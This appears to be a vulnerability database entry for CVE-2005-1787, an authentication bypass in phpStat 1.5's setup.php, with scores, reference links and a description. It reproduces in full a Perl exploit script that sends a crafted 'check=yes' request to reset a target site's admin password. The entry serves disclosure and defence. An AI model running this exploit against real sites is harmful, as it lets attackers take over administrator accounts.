CVE-2005-1787
CVSS 7.5
Published: 2005-05-27 00:00:00
Last revised: 2016-11-25 13:27:03

[Original] setup.php in phpStat 1.5 allows remote attackers to bypass authentication and gain administrator privileges by setting the $check variable.


[CNNVD] phpStat vulnerability (CNNVD-200505-1216)

        setup.php in phpStat 1.5 allows remote attackers to bypass authentication and gain administrator privileges by setting the $check variable.

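- CVSS (Base Score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CWE (Weakness Category)

CWE-20 [Improper Input Validation]

- CPE (Affected Platforms and Products)

Product and version information (CPE) is not yet available

- OVAL (Technical Details for Detection)

No related OVAL definitions found

- Official Database Links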

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1787
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1787
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-1216
(Official data source) CNNVD

- Other Links and Resources

http://marc.info/?l=bugtraq&m=111721290726958&w=2
(UNKNOWN)  BUGTRAQ  20050527 PHP Stat Administrative User Authentication Bypass
http://securitytracker.com/id?1014064
(VENDOR_ADVISORY)  SECTRACK  1014064
http://www.soulblack.com.ar/repo/papers/advisory/PhpStat_advisory.txt
(UNKNOWN)  MISC  http://www.soulblack.com.ar/repo/papers/advisory/PhpStat_advisory.txt
http://www.soulblack.com.ar/repo/tools/sbphpstatpoc.txt
(VENDOR_ADVISORY)  MISC  http://www.soulblack.com.ar/repo/tools/sbphpstatpoc.txt

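- Vulnerability Information

phpStat vulnerability
High risk  Unknown
2005-05-27 00:00:00 2005-10-20 00:00:00
Remote
        setup.php in phpStat 1.5 allows remote attackers to bypass authentication and gain administrator privileges by setting the $check variable.

- Advisories and Patches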

        

- Vulnerability Information (1016)

phpStat <= 1.5 (setup.php) Authentication Bypass Exploit (perl) (EDBID:1016)
php webapps
2005-05-30 Verified
0 Alpha_Programmer
N/A
#!/usr/bin/perl
#####################################################################
#T r a p - S e t   U n d e r g r o u n d   H a c k i n g   T e a m
#####################################################################
# EXPLOIT FOR - PHPStat Setup.PHP Authentication Bypass Vulnerability
#
#Exploit By :  A l p h a _ P r o g r a m m e r ( Sirus-v )
#E-Mail : Alpha_Programmer@Yahoo.com
#
#This Xpl Change Admin's Pass in This Portal !!
#Discovered by: SoulBlack
#
#Vulnerable Version : phpStat 1.5
#
#####################################################################
# Gr33tz To ==>   mh_p0rtal , Oil_karchack , Str0ke  &  AlphaST.Com
#
# So Iranian Hacking & Security Teams :
#
# Crouz , Shabgard , Simorgh-ev ,IHS , Emperor & GrayHatz.NeT
#####################################################################


use IO::Socket;

if (@ARGV < 3)
{
 print "\n==========================================\n";
 print " \n     -- Exploit By Alpha Programmer --\n\n";
 print "     Trap-Set UnderGrounD Hacking Team      \n\n";
 print "         Usage: <T4rg3t> <DIR> <Password>\n\n";
 print "==========================================\n\n";
 print "Examples:\n\n";
 print "    phpStat.pl www.Site.com /phpstat/ 12345\n";
 exit();
}

my $host = $ARGV[0];
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
PeerPort => "80" );

unless ($remote) { die "C4nn0t C0nn3ct to $host" }

print "C0nn3cted\n";

$http = "GET $ARGV[1]setup.php?check=yes&username=admin&password=$ARGV[2] HTTP/1.0\n";
$http .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)\n";
$http .= "Host: $host\n\n\n\n";

print "[+]Sending H3ll Packet ...\n";
print $remote $http;
sleep(1);
print "[+]Wait For Authentication Bypass ...\n";
sleep(100);
while (<$remote>)
{
}
print "[+]OK ! Now Goto $host$ARGV[1]setup.php And L0gin Whith:\n\n";
print "[+]User: admin\n";
print "[+]Pass: $ARGV[2]";

# milw0rm.com [2005-05-30]
		

- Vulnerability Information

16868
phpStat setup.php check Variable Authentication Bypass
Remote / Network Access Authentication Management
Loss of Integrity
Exploit Public

- Vulnerability Description

phpStat contains a flaw that may allow a remote attacker to bypass authentication settings. The issue is triggered due to an error in the authentication process in 'setup.php'. With a specially crafted request to the 'check' variable, a remote attacker can gain access to administrative privileges resulting in a loss of integrity.

- Timeline

2005-05-25 Unknown
2005-05-25 Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- Related References

- Vulnerability Author
